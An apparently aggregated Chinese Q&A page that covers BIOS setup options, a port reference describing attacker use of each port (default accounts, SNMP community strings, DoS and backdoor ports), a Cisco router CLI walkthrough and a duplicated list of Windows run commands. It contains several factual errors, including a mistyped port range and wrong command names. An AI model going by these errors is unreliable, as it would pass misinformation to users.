他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器,该项功能可以自动读出硬盘参数,并将它们自动记入标准CMOS设定中,它最多可以读出四个IDE硬盘的参数。
以上介绍了Award BIOS Setup的常用选项的含义及设置办法。更改设置后,选Save and Exit Setup项或按F10键保存,使所修改的内容生效。
AWARD BIOS是一种比较常用的BIOS,各主板制造商都其基础根据主板特性上进行了调整。因而本文只介绍了AWARD BIOS的一些最普遍的设置,以供参考,读者还应仔细阅读随主板附带的说明书。
AMI BIOS
BIOS是英文Basic Input/Output System(基本输入/输出系统)的缩写,其程序储存在主板上的 EPROM或Flash ROM 内,作用是测试装在主板上的部件能否正常工作,并提供驱动程序接口,设定系统相关配备的组态。当你的系统配件与原CMOS参数不符合时,或CMOS参数遗失时,或系统不稳定时,就需要进入BIOS设定程序,以重新配置正确的系统组态。
进入AMI BIOS设定程序
1. 打开系统电源或重新启动系统,显示器屏幕将出现自我测试的信息;
2. 当屏幕中间出现"Press to enter setup"提示时,按下 键,就可以进入BIOS设定程序。
3. 以方向键移动至你要修改的选项,按下键即可进入该选项的子画面;
4. 使用 方向键及〈Enter〉键即可修改所选项目的值,也可用鼠标(包括PS/2鼠标)选择BIOS选项并修改。
5. 任何时候按下键即可回到上一画面;
6. 在主画面下,按下键,选择“Saving Changes And Exit"即可储存你的新设定并重新启动系统。选择“Exit Without Saving",则会忽略你的改变而跳出设定程序。
Standard Setup(标准设定)窗口
Date/Time: 显示当前的日期/时间,可修改。
Floppy Drive A,B: 设定软盘驱动器类型为None/720K/1.2M/1.44M/2.88M 。
Pri Master/Slave以及Sec Master/Slave: 此选项可设定:
HDD Type(硬盘类型): Auto(自动检测)、SCSI(SCSI HDD)、CD-ROM驱动器、Floptical(LS-120大容量软驱)或是Type 1~47等IDE设备。
LBA/Large: 硬盘LBA/Large 模式是否打开。目前540M以上的硬盘都要将此选项打开(On),但在Novell Netware 3.xx或4.xx版等网络操作系统下要视情况将它关掉(Off)。
Block Mode: 将此选项设为On,有助于硬盘存取速度加快,但有些旧硬盘不支持此模式,必须将此选项设为Off。32 Bit Mode: 将此选项设为On,有助于在32位的操作系统(如WIN95/NT)下加快硬盘传输速度,有些旧硬盘不支持此模式,必须将此选项设为Off。
PIO Mode: 支持PIO Mode0~Mode5(DMA/33)。用BIOS程序自动检查硬盘时,会自动设置硬盘的PIO Mode。
注意:当你在系统中接上一台IDE设备(如硬盘、光驱等)时,最好进入BIOS,让它自动检测。如果使用的是抽屉式硬盘的话,可将Type设成Auto,或将Primary以及Secondary的Type都改成 Auto 即可。所谓Primary指的是第一IDE接口,对应于主板上的IDE0插口,Secondary指的是第二IDE接口,对应于主板上的IDE1插口。每个IDE接口可接Master/Slave(主/从)两台IDE设备。
Advanced Setup(高级设定)窗口
1st/2rd/3rd/4th Boot Device: 开机启动设备的顺序,可选择由IDE0~3、SCSI、光驱、软驱、 Floptical (LS-120大容量软驱)或由Network(网络)开机。
S.M.A.R.T For HardDisk: 开启(Enable)硬盘S.M.A.R.T 功能。如果硬盘支持,此功能可提供硬盘自我监控的功能。
Quick Boot: 开启此功能后,可使开机速度加快。
Floppy Drive Swap: 若将此功能Enable,可使A驱与B驱互换。
PS/2 Mouse Support : 是否开启PS/2鼠标口,若设定为Enable,则开机时,将IRQ12保留给PS/2鼠标使用,若设定为Disable,则IRQ12留给系统使用。
Password Check: 设定何时检查Password(口令),若设定成Setup时,每次进入BIOS设定时将会要求输入口令,若设定成Always时,进入BIOS或系统开机时,都会要求输入口令,但先决条件是必须先设定口令(Security窗口中的User选项)。
Primary Display: 设定显示卡的种类。
Internal Cache: 是否开启CPU内部高速缓存(L1 Cache),应设为Enable。
External Cache: 是否开启主板上的高速缓存(L2 Cache),应设为Enable。
System BIOS Cacheable: 是否将系统BIOS程序复制到内存中,以加快BIOS 存取速度。
C000-DC00,16K Shadow: 此8项是将主内存的UpperMemory(上位内存区)开启,将所有插卡上 ROM程序映射到内存中,以加快CPU对BIOS的执行效率。Disable:不开启本功能;Enable:开启,且可提供读写区段功能;Cached:开启,但不提供读写功能。
Chipset Setup(芯片组设定)窗口
本功能中的选项有助于系统效率的提升,建议使用默认值。若将某些Chipset、DRAM/SDRAM或SRAM 部分的Timing值设得过快,可能会导致系统"死机"或运行不稳定,这时可试着将某些选项的速度值设定慢一点。
USB Function Enabled: 此选项可开启USB接口的功能,如没有USB设备,建议将此选项设为Disable, 否则会浪费一个IRQ资源。
DRAM Write Timing: 设定DRAM的写入时序,建议值如下: 70ns DRAM: X-3-3-3; 60ns DRAM: X-2-2-2。
Page Mode DRAM Read Timing: 设定DRAM读取时序,建议值如下 : 70ns DRAM: X-4-4-4; 60ns DRAM: X-3-3-3。
RAS Precharge Period: 设定DRAM/EDO RAM的Precharge(预充电)时间,建议设成4T。
RAS to CAS Delay Time: 设定DRAM中RAS到CAS延迟时间,建议设定成3T。
EDO DRAM Read Timing: 设定EDO DRAM读取时序,建议值如下: 70ns DRAM : X-3-3-3; 60ns DRAM : X-2-2-2。
DRAM Speculative Read: 此选项是设定DRAM推测性的引导读取时序,建议设定成Disable。
SDRAM CAS Latency: 设定SDRAM的CAS信号延迟时序,建议设定值如下 :
15ns(66MHz)/12ns(75MHz) SDRAM: 3
10ns(100MHz) SDRAM: 2。
SDRAM Timing: 设定SDRAM(同步内存)的时序,建议设定值如下:
15ns(66MHz)/12ns(75MHz) SDRAM: 3-6-9
10ns(100MHz) SDRAM: 3-4-7。
注意:若系统使用SDRAM不稳时,建议将SDRAM速度调慢。
SDRAM Speculative Read : 此选项是设定SDRAM推测性的引导读取时序,建议设定成Disable。
Pipe Function: 此选项设定是否开启Pipe Function(管道功能),建议设定成Enable。
Slow Refresh: 设定DRAM的刷新速率,有15/30/60/120us ,建议设在60us。
Primary Frame Buffer: 此选项保留,建议设定成Disable。
VGA Frame Buffer: 设定是否开启VGA帧缓冲,建议设为Enable。
Passive Release: 设定Passive Release(被动释放)为Enable时,可确保CPU与PCI总线主控芯片(PCI Bus Master)能随时重获对总线的控制权。
ISA Line Buffer: 是否开启ISA总线的Line Buffer,建议设为Enable。
Delay Transaction: 设定是否开启芯片组内部的Delay Transaction(延时传送),建议设成 Disable。
AT Bus Clock: 设定ISA总线时钟,建议设成Auto。
Power Management Setup(能源管理)窗口
能源管理功能可使大部份周边设备在闲置时进入省电功能模示,减少耗电量,达到节约能源的目的。电脑在平常操作时,是工作在全速模式状态,而电源管理程序会监视系统的图形、串并口、硬盘的存取、键盘、鼠标及其他设备的工作状态,如果上述设备都处于停顿状态,则系统就
会进入省电模式,当有任何监控事件发生,系统即刻回到全速工作模式的状态。省电模式又分为“全速模式(Normal)、打盹模式 (Doze)、待命模式(Standby)、沉睡模式(Suspend)",系统耗电量大小顺序:Normal>Doze> Standby > Suspend。
Power Management/APM: 是否开启APM省电功能。若开启(Enable),则可设定省电功能。
Green PC Monitor Power State/Video Power Down Mode/Hard Disk Power Down Mode :设定显示器、显示卡以及硬盘是否开启省电模式,可设定成Standby、Suspend以及Off(即不进入省电模式)。
Video Power Down Mode: 设定显示器在省电模式下的状态 isable: 不设定 ;Stand By: 待命模式;Suspend: 沉睡模式。
Hard Disk Power Down Mode: 设定硬盘在省电模式下的状态。(同上)
Standby Timeout/Suspend Timeout: 本选项可设定系统在闲置几分钟后,依序进入Standby Mode/Suspend Mode等省电模式。
Display Activity: 当系统进入Standby Mode时,显示器是否进入省电模示,Ingroe:忽略不管;Monitor:开启。
Monitor Serial Port/Paralell Port/Pri-HDD/Sec- HDD/VGA /Audio/Floppy: 当系统进入省电模式后,是否监视串并行口、主从硬盘、显示卡、声卡、软驱的动作。Yes:监视,即各设备如有动作,则系统恢复到全速工作模式;N不监视。
Power Button Override: 是否开启电源开关功能。
Power Button Function: 此选项是设定当使用ATX电源时,电源按扭(SUS-SW) 的作用。
Soft Off: 按一次就进入Suspend Mode,再按一次就恢复运行。Green: 按第一下便是开机,关机时要按住4秒。
Ring resume From Soft Off:是否开启Modem唤醒功能。
RTC Alarm Resume From Soft Off: 是否设定BIOS 定时开机功能。
PCI/PnP Setup窗口
此选项可设定即插即用(PnP)功能。
OnBoard USB: 是否开启芯片组中的USB功能。
Plug and Play Aware OS: 如你的操作系统(OS)具有PnP功能(如 Win95),此项应选Yes;若不是,则选No。如某些 PnP卡无法检测到时,建议设成No。
PCI Latency Timer: 此选项可设定PCI时钟的延迟时序。
Offboard PCI IDE Card: 如使用了其它的PCI IDE卡,则此项必须设定,这要视你的PCI IDE卡是插在哪个Slot(1-4)上而定,并设定以下各IDE IRQ 值。Slot5、6以及Hardwared为保留选项。
Offboard PCI IDE Primary IRQ: 设定PCI IDE卡上IDE 0所要占用的INT# ,一般都是设定成INT#A。
Offboard PCI IDE Secondary IRQ: 设定PCI IDE卡上IDE 1所要占用的INT#,一般都是设定成 INT#B。
Assign IRQ to PCI VGA Card: 指定一个IRQ给VGA卡使用,一般不用指定IRQ给VGA卡。
IRQ 3、4、5、7、9、10、11、12、14、15/DMA Channel 0、1、3、5、6、7:本选项是设定各IRQ/DMA 是否让PnP卡自动配置,若设定成PCI/PnP,则BIOS检测到PnP卡时,会挑选你所有设成PCI/PnP状态的其中一个IRQ/DMA来使用;反之,若设成ISA/EISA,则BIOS 将不会自动配置。一般设为PCI/PnP。
Peripheral Setup(外围设备设定)窗口

Ⅷ 系统里的那些端口在哪里

什么是端口号,一个端口就是一个潜在的通讯通道,也是一个入侵通道,开放一个端口就是一台计算机在网络上打开了一扇窗户,黑客入侵的方法就是用手工扫描或利用扫描软件找到服务器所开放的端口,去根据其相应的漏洞对服务器进行入侵或攻击,因此对端口的了解是非常重要的。

端口大概分为三类:

1:公认端口(well known ports):从0-1023,他们是绑定于一些服务。通常这些端口的通信明确表明了某种服务的协议。比如,21端口是FTP服务所开放的。

2:注册端口(registrerd ports):从1024-49151,他们松散的绑定于一些服务也就是说有许多服务绑定于这些端口,这些端口同样用于许多其他目的。比如,许多系统处理动态端口是从1024开始的。

3:动态或私有端口(dynamic and/or private ports):从49512-65535,理论上不应该为服务分配这些端口。实际上,计算机通常从1024开始分配动态端口。当然也有例外的,SUN的RPC端口从32768开始。

下边附常用端口列表:

端口大全

不同的端口有不同的作用希望大家能有所收获。

0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似。再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11。

19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pron的节点。
22 ssh PcAnywhere 建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)。还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。

23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67&68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。

79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

80 HTTP服务器所用到的端口。

98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://news.hackervip.com/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?这个端口除了被用来查询服务(如使用epmp)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息。

139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2,但并不流行。已有一些报道发现有些0到143端口的攻击源于脚本。
161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台, 它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procere call)系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口。

一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

1025,1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP)

1433 MSSQL数据库服务端口

1524 ingreslock 后门许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun系统中sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。
2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS运行于这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。

3306 MYsql数据库服务端口

5632 pcAnywere 你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)

6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。

13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Concent 这是一个外向连接。这是由于公司内部有人安装了带有Concent "adbot" 的共享软件。Concent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:

机器会不断试图解析DNS名—ads.concent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP)

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “elite” Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。

Ⅸ 思科路由器2600配置

老老实实看书吧,可以先看个ccna学习指南。

随便举几个指令例子给你好了:

Route> 你进来是这个样子
Route>en 打个en回车 进入特权模式
Route# 就是这个样子
Router#conf t 打完这个
Enter configuration commands, one per line. End with CNTL/Z. 这个是自动显示出来的,别打
Router(config)# 就进入全局配置模式
Router(config)#hostname R1 打这个就改名
R1(config)# 现在名字叫r1 了
R1(config)#exit 打这个就退出全局配置模式了
%SYS-5-CONFIG_I: Configured from console by console

R1#show run 打这个就看配置了
Building configuration...

Current configuration : 510 bytes
!
version 12.2
no service password-encryption
!
hostname R1
!
!
!
!
!
ip ssh version 1
!
!
interface FastEthernet0/0
no ip address
plex auto
speed auto
shutdown

下面一大堆就不显示了,先教你进端口配ip

R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#interface FastEthernet0/0 这样就是进端口f0/0 你自己对应你的端口
R1(config-if)#ip add 192.168.1.1 255.255.255.0 这个就是配ip了
R1(config-if)#no sh 这个是up端口

%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up

这个时候你拿台电脑,连上配好的口
电脑的ip 配 192.168.1.2 255.255.255.0

路由器上的灯该闪了,路由器界面上会显示类似
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up
的信息。

配到这,你在电脑上ping 192.168.1.1 是通的。

其实找本书翻翻一上午足够了。有问题留言我。

Ⅹ 系统配置

winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令

dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器

net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员C作请求
netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器

packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器

regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序

osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令

iexpress-------木马捆绑工具,系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略

...-----我的电脑

winver 检查Windows版本
wmimgmt.msc 打开Windows管理体系结构(wmi)
wupdmgr Windows更新程序
wscript Windows脚本宿主设置
write 写字板
winmsd 系统信息
wiaacmgr 扫描仪和照相机向导
winchat xp自带局域网聊天
mem.exe 显示内存使用情况
msconfig.exe 系统配置实用程序
mplayer2 简易widnows media player
mspaint 画图板
mstsc 远程桌面连接
mplayer2 媒体播放机
magnify 放大镜实用程序
mmc 打开控制台
mobsync 同步命令

dxdiag 检查directx信息
drwtsn32 系统医生
devmgmt.msc 设备管理器
dfrg.msc 磁盘碎片整理程序
diskmgmt.msc 磁盘管理实用程序
dcomcnfg 打开系统组件服务
ddeshare 打开dde共享设置
dvdplay dvd播放器

net stop messenger 停止信使服务
net start messenger 开始信使服务
notepad 打开记事本
nslookup 网络管理的工具向导
ntbackup 系统备份和还原
narrator 屏幕“讲述人”
ntmsmgr.msc 移动存储管理器
ntmsoprq.msc 移动存储管理员操作请求
netstat -an (tc)命令检查接口

syncapp 创建一个公文包
sysedit 系统配置编辑器
sigverif 文件签名验证程序
sndrec32 录音机
shrpubw 创建共享文件夹
secpol.msc 本地安全策略
syskey 系统加密,一旦加密就不能解开,保护Windows xp系统的双重密码
services.msc 本地服务设置
sndvol32 音量控制程序
sfc.exe 系统文件检查器
sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令
tourstart xp简介(安装完成后出现的漫游xp程序)
taskmgr 任务管理器

eventvwr 事件查看器
eudcedit 造字程序
explorer 打开资源管理器

packager 对象包装程序
perfmon.msc 计算机性能监测程序
progman 程序管理器

regedit.exe 注册表
rsop.msc 组策略结果集
regedt32 注册表编辑器
rononce -p 15秒关机
regsvr32 /u *.dll 停止dll文件运行
regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁盘检查
certmgr.msc 证书管理实用程序
calc 启动计算器
charmap 启动字符映射表
cliconfg sql server 客户端网络实用程序
clipbrd 剪贴板查看器
conf 启动netmeeting
compmgmt.msc 计算机管理
cleanmgr 垃圾整理
ciadv.msc 索引服务程序

osk 打开屏幕键盘
odbcad32 odbc数据源管理器
oobe/msoobe /a 检查xp是否激活
lusrmgr.msc 本机用户和组
logoff 注销命令

iexpress 木马捆绑工具,系统自带

